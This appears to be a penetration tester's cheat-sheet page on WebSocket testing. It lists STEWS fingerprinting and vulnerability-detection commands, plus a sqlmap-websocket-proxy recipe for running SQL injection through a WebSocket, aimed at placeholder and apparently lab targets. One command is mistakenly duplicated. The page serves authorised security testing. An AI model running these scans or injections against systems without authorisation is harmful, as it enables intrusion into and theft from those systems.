WebSocket

STEWS

Discovery:

https://github.com/PalindromeLabs/STEWS/blob/main/discovery/README.md

Fingerprinting:

# SSL/TLS
python3 STEWS-fingerprint.py -a -k -u websocket.host.com

# No enc
python3 STEWS-fingerprint.py -a -n -u websocket.host.com

Vulnerability Enum:

run the vulnerabilities from 1-4

# SSL/TLS 
python3 STEWS-vuln-detect.py -1 -k -u websocket.host.com

# No enc
python3 STEWS-fingerprint.py -a -n -u websocket.host.com

WebSocket SQLi

use 'sqlmap-websocket-proxy' to proxy the WebSocket connection:

# install
python3 -m pip install sqlmap-websocket-proxy

# run the proxy
sqlmap-websocket-proxy -u ws://sketchyurl.htb:8081 -p '{"uid_of_some_sort": "%param%"}' --json

# SQLMap
sqlmap -u http://localhost:8080/?param1=1

Last updated